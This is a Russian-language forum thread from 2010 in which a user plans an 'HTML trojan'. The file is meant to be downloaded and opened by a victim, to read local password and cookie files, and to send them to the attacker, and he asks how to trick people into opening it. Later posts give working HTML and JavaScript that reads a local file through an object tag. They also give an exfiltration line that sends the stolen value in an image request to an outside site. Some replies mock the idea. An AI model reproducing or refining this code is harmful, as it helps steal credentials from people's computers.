кража поролей ява скриптом
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
кража поролей ява скриптом - 2010-08-10 23:21:12.750000
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
Здравствуйте уважаемые хакеры у меня появилась идея своровать пороли с помощью хтмл файлика (тобиш юзер его загружает, открывает и пороли отправляются мне) я себе представляю это как то так: в моем файле через тег object будет подгружаться файл с паролями и интерпритироватся как хтмл код а потом я буду обращаться к ниму ява скриптом и отправлять себе на сервер, но у меня есть некоторые сложности 1 куки хранятся по принципу имя учетки@имя куки не зная имя учетки я не смогу подгрузить нужный файл 2 как обратится из ява скрипта к содержимому подгруженного файла если в нем отсутствуют элементы хтмл разметки те document.getElementById('obj').contentWindow.document а далше то что? 3 как эту хрень можно впарить?
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 16:39:53.036666
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
Млин не ужели ни кто за месяц не смог ответить? и так попробую немного уточнить: 1 имена учеток скорее можно найти в файлах винды или в логах программ вопрос тока где конкретнее… 2 моих познаний в программировании не достаточно, но если это нельзя сделать с помощью ява скриптов то возможно это удастся сделать с помощью других скриптов исполняемых на стороне клиента… 3 думаю здесь полно вариантов, хотя заставить взрослого серьезного дядю, надо подумать….
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 16:46:28.496666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Вы дурак - срипт не имеет доступа к локальным файлам, это очевидно. Было бы у вас желание узнать - вы бы не мучали никого идиотскими вопросами.
|
|
|
RE: кража поролей ява-мотоциклом - 2010-09-01 16:58:50.363333
|
|
|
Mатцал Коушек
Сообщений: 10407
Оценки: 91
Присоединился: 2008-07-09 10:27:49.520000
|
quote:
ORIGINAL: Pupkin-Zade не мучали никого идиотскими вопросами. Я, лично, ими не мучаюсь. Я ими наслаждаюсь. Это прост кайф, какую галиматью пишут и как уверены, что она сработает. <<- document.getElementById('obj').contentWindow.document а далше то что? 3 как эту хрень можно впарить? ->> Выдумать такую хрень, внушить себе, что эту хрень можно впарить, сюда об этом топик впарить, и месяц(!) ожидать, что ему сюда ответ впарят.
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 17:29:51.206666
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
quote:
Вы дурак - срипт не имеет доступа к локальным файлам я еще раз повторюсь что пользователь сначала загрузит файл, а потом откроет quote:
document.getElementById('obj').contentWindow.document это всего лишь кусок кода впарывать мне надо хтмл файл quote:
месяц(!) меня просто не было
|
|
|
RE: кража поролей ява скриптом - 2010-09-01 23:00:25.433333
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
и так дабы прервать наслаждение некоторых и показать им на рабочем примере что я имел ввиду( и за одно что не все школьники придурки ) покажу на примере: создаем файл pass на диске С и в нем пишим: <div>супер пупер пароль</div> далее создаем файл с произвольным названием и место положением и пишим в него: <html> <body> <object data="file:///C:/pass" type="text/html" id="obj"></object> <script type="text/javascript"> pass=document.getElementById('obj').contentWindow.document.getElementsByTagName('div')['0'].innerHTML document.getElementById('obj').style.display="none" alert(pass) </script> </body> </html> открываем его и вуаля информация из файла на вашем компьютере записана в переменную pass( для тех кто не понял ее можно отправлять на сервер как то так на пример: document.write('<img src="site.ru?pass='+pass+'" style="display: none" />') ) но вся проблема в том что в моем примере у нас в файле имеются элемент разметки( блок div ) - обект к которому мы обращаемся из нашего скрипта(document.getElementById('obj').contentWindow.document.getElementsByTagName('div')['0']) а как получить информацию из файла где нет разметки те если бы в файле pass было бы просто написано супер пупер пароль? а да еще забыл сказать доступ к локальным файлам получить можно, но для этого надо заставить юзера изменить файл с конфигурацией об этом написано тут - http://kb.mozillazine.org/Links_to_local_pages_don%27t_work
|
|
|
RE: кража поролей ява скриптом - 2010-09-02 17:38:37.753333
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
quote:
а да еще забыл сказать доступ к локальным файлам получить можно, но для этого надо заставить юзера изменить файл с конфигурацией об этом написано тут - http://kb.mozillazine.org/Links_to_local_pages_don%27t_work извиняюсь тупанул в статье выше показано как выводить локальные файлы взаимодействие с ними не возможно так как для этого у них должен быть один и тот же протокол и домен, но это не имеет отношения к рассматриваемому мной примеру так как в моем случае HTML троян находится не на удаленном сервере, а на компьютере юзера
|
|
|
RE: кража поролей ява скриптом - 2010-09-03 18:38:51.810000
|
|
|
задолбался регаться
Сообщений: 92
Оценки: 0
Присоединился: 2010-08-10 22:40:22.650000
|
Матцал Коушек, смеется тот кто смеется последним))) pass=document.getElementById('obj').contentWindow.document.getElementsByTagName('pre')['0'].innerHTML не смотря на то что в документе нет тега pre браузер автоматически его создает, а значит у нас есть DOM объект к которому мы можем обратится
|
|
|
RE: кража поролей ява скриптом - 2010-09-03 23:17:50.556666
|
|
|
Як Истребитель
Сообщений: 410
Оценки: 0
Присоединился: 2010-01-27 19:48:58.473333
|
ТС придумал новый вид троя, топик срочно в приват!!1 Вообще, сначала надо удлиннить файл конфигурации, только потом изменять. А то разметка тормозить будет.
|
|
|
|
|